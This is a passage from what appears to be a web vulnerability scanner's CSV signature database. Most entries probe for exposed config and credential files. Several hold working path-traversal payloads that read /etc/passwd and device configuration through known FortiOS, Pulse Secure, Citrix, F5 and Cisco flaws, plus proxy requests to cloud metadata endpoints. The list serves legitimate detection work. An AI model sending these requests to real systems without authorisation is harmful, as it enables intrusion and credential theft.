CNVD-C-2019-48814","8a","/_async/AsyncResponseServiceJms?WSDL","GET","200","www.bea.com/async/AsyncResponseService","","","","BEA WebLogic may allow remote takeover.","","" "007248","","23","@WORDPRESS.wp-config.php.swp","GET","DB_NAME","","","","",".wp-config.php.swp file found. This file is swap file created when editing with vi/vim editor. This file contains the database credentials.","","" "007249","","23","@WORDPRESSwp-config.php~","GET","DB_NAME","","","","","wp-config.php~ file found. This file is a backup file created when editing with emacs editor. This file contains the database credentials.","","" "007250","","23","@WORDPRESSwp-config.php.bak","GET","DB_NAME","","","","","wp-config.php.bak file found. This file contains the database credentials.","","" "007251","","23","@WORDPRESSwp-config.php.bakup","GET","DB_NAME","","","","","wp-config.php.bakup file found. This file contains the database credentials.","","" "007252","","23","@WORDPRESS#wp-config.php#","GET","DB_NAME","","","","","#wp-config.php# file found. This file contains the database credentials.","","" "007253","","23","@WORDPRESSwp-config.php_bak","GET","DB_NAME","","","","","wp-config.php_bak file found. This file contains the database credentials.","","" "007254","","3","http://100.100.100.200/latest/meta-data/","GET","user-data","","","","","The Alibaba Cloud host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 100.100.100.200\r\n" "007255","","1","/.tools/webmail","GET","200","","webmail","","","Webmail Found. Possibly on Media Temple/Gridserver.","","" "007256","https://developer.apple.com/documentation/xcode/allowing-apps-and-websites-to-link-to-your-content","3","/apple-app-site-association","GET","200","","applinks","","","Apple Universal Links.","","" "007257","RFC-5785","3","/.well-known/apple-app-site-association","GET","200","","applinks","","","Apple Universal Links.","","" "007258","RFC-5785","3","/.well-known/assetlinks.json","GET","200","","relation","","","Android App Links.","","" "007259","","be","/","GET","share\.router","router\.copyright","image/cisco_logo_about\.png","","","Cisco (RV) router login page detected.","","" "007260","CVE-2019-1898 https://www.tenable.com/security/research/tra-2019-29","235","/_syslog.txt","GET","[0-9]{4}-[0-9]{2}-[0-9]{2}\s[0-9:]+\sRV[0-9]+W","","200","","","Cisco RV110W/RV130W/RV215W router allows remote access to the syslog.","","" "007261","","be","/remote/login?lang=en","GET","(<span>Launch\sFortiClient</span>|launchFortiClient\(\)|/remote/fgt_lang)","","200","","","FortiOS SSL VPN login page detected.","","" "007262","CVE-2018-13379","2357","/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession","GET","var\sfgt_lang\s=","","200","","","FortiOS SSL VPN is vulnerable to a local file inclusion (LFI) vulnerability.","","" "007263","","be","/dana-na/auth/url_default/welcome.cgi","GET","<title>Pulse\sConnect\sSecure","","<b>Welcome\sto</b>","","","Pulse Connect Secure login page detected.","","" "007264","CVE-2019-11510 https://exploit-db.com/exploits/47297","2357","/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/","GET","root:.*:0:[01]:","","","","","Pulse Connect Secure is vulnerable to a local file inclusion (LFI) vulnerability.","","" "007265","","be","/app/ui/login.jsp","GET","<!--.+login\spage\s-->","Cisco\sUCS\sDirector","200","","","Generic login page (possible Cisco UCS Director) detected.","","" "007266","","3","http://169.254.169.254/hetzner/v1/metadata/private-networks","GET","alias_ips:","","","","","The Hetzner Cloud host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\n" "007267","","3","http://192.0.0.192/latest/","GET","user-data","","","","","The Oracle Cloud host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: \192.0.0.192\r\naccept: */*\r\nProxy-Connection: Keep-Alive\r\n" "007268","","3","http://169.254.169.254/metadata/instance?api-version=2017-08-01","GET","instance\/","","","","","The Azure host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\naccept: */*\r\nMetadata: true\r\n" "007269","CVE-2019-19781 https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/","8","/vpn/../vpns/cfg/smb.conf","GET","(name\sresolve\sorder|encrypt\spasswords)\s*=","^\[global\]","200","","","Citrix ADC and Citrix Gateway are vulnerable to a local file inclusion (LFI) vulnerability.","","" "007270","","23","/whoAmI","GET","IsAuthenticated","","","","","The Jenkins \"Who Am I?\" page is exposed and may reveal system/app information.","","" "007271","","3","/.coveralls.yml","GET","repo_token","","","","","A Coveralls.io file is exposed and contains a repository token, which could allow access to source control","","" "007272","","3","/nginx_status","GET","Active\sconn","","","","","Nginx status page found","","" "007273","","3","/Dockerfile","GET","FROM\s","ENTRYPOINT\s","ENV\s","","","Dockerfile found.","","" "007274","","3","/cdn-cgi/trace","GET","visit_scheme=","","","","","Cloudflare trace CGI found, which may leak some system information.","","" "007275","https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","3","/v1/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information.","","" "007276","https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","3","/v2/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information.","","" "007277","https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","3","/v3/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information.","","" "007278","https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","3","/v4/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information.","","" "007279","","23","/.dockerignore","GET","200","","","","",".dockerignore file found. It may be possible to grasp the directory structure and learn more about the site.","","" "007280","CVE-2020-5902","7","/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts","GET","\{\"output\":\"","","","","","The F5 Big-IP's TMUI is vulnerable to a local file inclusion vulnerability and likely command exec.","","" "007281","","be","/","GET","BIG-IP®- Redirect","","200","","","F5 BIG-IP Traffic Management User Interface (TMUI) detected.","","" "007282","","1","/var/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","/var directory has indexing enabled.","","" "007283","","1","/var/log/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","/var directory has indexing enabled.","","" "007284","","1","/etc/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","'/etc directory has indexing enabled.","","" "007285","","12","/.ftpconfig","GET","\"port\":","","","","","This file may contain login credentials.","","" "007286","","12","/.remote-sync.json","GET","\"port\":","","","","","This file may contain login credentials.","","" "007287","","12","/.vscode/ftp-sync.json","GET","\"port\":","","","","","This VSCode file may contain login credentials.","","" "007288","","12","/.vscode/sftp.json","GET","\"port\":","","","","","This VSCode file may contain login credentials.","","" "007289","","12","/deployment-config.json","GET","\"port\":","","","","","This file may contain login credentials.","","" "007290","","12","/ftpsync.settings","GET","\"port\":","","","","","This file may contain login credentials.","","" "007291","","12","/sftp-config.json","GET","\"port\":","","","","","This file may contain login credentials.","","" "007292","","1","/Service/","GET","You have created a service","","","","","WCF endpoint found.","","" "007293","","1","/Services/","GET","You have created a service","","","","","WCF endpoint found.","","" "007294","","1","/Services/BackOfficeService.svc?wsdl","GET","You have created a service","","","","","WCF endpoint found.","","" "007295","","1","/Service/BackOfficeService.svc?wsdl","GET","You have created a service","","","","","WCF endpoint found.","","" "007296","","1","/Service/Service.svc","GET","You have created a service","","","","","WCF endpoint found.","","" "007297","","1","/Services/Service`.svc","GET","You have created a service","","","","","WCF endpoint found.","","" "007298","","1","/Service/Service1.svc","GET","You have created a service","","","","","WCF endpoint found.","","" "007299","","1","/Services/Service1`.svc","GET","You have created a service","","","","","WCF endpoint found.","","" "007300","","1","/BackOffice/Services/","GET","You have created a service","","","","","WCF endpoint found.","","" "007301","","3","/phpci.yml","GET","build_settings:","","","","","PHP CI config file found.","","" "007302","","1","/README.md","GET","200","","","","","Readme Found","","" "007303","CVE-2013-6235","3","/JAMonAdmin.jsp","GET","\| JAMonAdmin \|","","200","","","JAMon - Java Application Monitor Admin interface identified. Versions 2.7 and earlier contain XSS vulnerabilities.","","" "007304","CVE-2020-5902","7","/hsqldb;","GET","<title>HSQL Database Engine Servlet</title>","","","","","The F5 Big-IP's TMUI is vulnerable to a local file inclusion vulnerability and likely command exec.","","" "007305","https://packetstormsecurity.com/files/32406/xmas.txt.html","23","/shopdbtest.asp","GET","xDatabase","","","","","VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase).","","" "007306","https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html","2","http://169.254.169.254/latest/meta-data/","GET","iam/","","","","","The host is configured as a proxy which allows access to the AWS Meta-Data service. With some IAM role permissions this could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\n" "007307","https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html","2","http://169.254.169.254/latest/dynamic/instance-identity/document","GET","privateIp","","","","","The AWS host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\n" "007308","https://cloud.google.com/compute/docs/storing-retrieving-metadata","2","http://169.254.169.254/computeMetadata/v1/project/","GET","attributes\/","","","","","The Google Cloud Platform host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\nMetadata-Flavor: Google" "007309","https://docs.openstack.org/nova/latest/admin/metadata-service.html","2","http://169.254.169.254/openstack/latest","GET","vendor_data\.json","","","","","The OpenStack host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\n" "007310","https://developers.digitalocean.com/documentation/metadata/","2","http://169.254.169.254/metadata/v1.json","GET","droplet_id","","","","","The DigitalOcean host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\n" "007311","https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/","2","http://rancher-metadata/2015-07-25/","GET","containers\/","","","","","The Rancher host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: \rancher-metadata\r\n" "007312","https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html","2","http://aws.cirt.net/latest/meta-data/","GET","iam/","","","","","The host is configured as a proxy which allows access to the AWS Meta-Data service. With some IAM role permissions this could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007313","https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html","2","http://aws.cirt.net/latest/dynamic/instance-identity/document","GET","privateIp","","","","","The AWS host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007314","https://cloud.google.com/compute/docs/storing-retrieving-metadata","2","http://aws.cirt.net/computeMetadata/v1/project/","GET","attributes\/","","","","","The Google Cloud Platform host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\nMetadata-Flavor: Google" "007315","https://docs.openstack.org/nova/latest/admin/metadata-service.html","2","http://aws.cirt.net/openstack/latest","GET","vendor_data\.json","","","","","The OpenStack host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007316","https://developers.digitalocean.com/documentation/metadata/","2","http://aws.cirt.net/metadata/v1.json","GET","droplet_id","","","","","The DigitalOcean host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007317","","3","http://aws.cirt.net/metadata/instance?api-version=2017-08-01","GET","instance\/","","","","","The Azure host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007318","","3","http://aws.cirt.net/hetzner/v1/metadata/private-networks","GET","alias_ips:","","","","","The Hetzner Cloud host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007319","","e","/graphql","GET","GraphQL\sPlayground","","","","","The GraphQL Playground may allow direct querying of the database","","" "007320","","35","/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","GET","INTERNAL_PASSWORD_ENABLED","","","","","Cisco VPN host is vulnerable to CVE-2020-3452 which may allow disclosure oof information","","" "007321","","23","@WORDPRESSwp-config.php","GET","DB_NAME","","","","","wp-config.php file found without PHP processing. This file contains the database credentials.","","" "007322","","1","/sellers.json","GET","\"seller_id\"","\"domain\"","","","","The sellers.json file can reveal information about Google Adwords or other advertising networks in use.","","" "007323","","1","/ads.txt","GET","DIRECT","google.com,","","","","The ads.txt file can reveal information about Google Adwords or other advertising networks in use.","","" "007324","","be","/session_login.cgi","GET","Webmin","","enter a username","","","Webmin allows system administration via root login","","" "007325","","8","/radio.php","GET","Login Page","","password","","","PHP backdoor found.","","" "007326","","1","/app-ads.txt","GET","DIRECT","google.com,","","","","The ads.txt file can reveal information about Google Adwords or other advertising networks in use.","","" "007327","RFC-5785","3","/.well-known/jwks","GET","keys","","kty","","","JWKS file found","","" "007328","https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/certificate-authority-web-enrollment","1","/certsrv/certfnsh.asp","GET","Active Directory Certificate Services","","200","","","Active Directory Certificate Services found","","" "007329","https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/certificate-authority-web-enrollment","1","/certsrv/certfnsh.asp","GET","401","","","","","Active Directory Certificate Services found (requires authentication)","","" "007330","https://getcomposer.org/","23","/vendor/composer/installed.json","GET","\"(require|name)\":\s","","","","","PHP Composer configuration file reveals configuration information.","","" "007331","https://getcomposer.org/","23","/.composer/composer.json","GET","\"(require|name)\":\s","","","","","PHP Composer configuration file reveals configuration information.","","" "007332","https://swagger.io/","e3","/swagger/index.html","GET","Swagger UI","","","","","Swagger UI was found.","","" "007333","","e","/graphql","GET","category\"\:\"graphql","","","","","GraphQL endpoint found","","" "007334","","b","/","GET","Cockpit\sfrom\srunning","","","","","Cockpit server admin is running. https://cockpit-project.org/","",""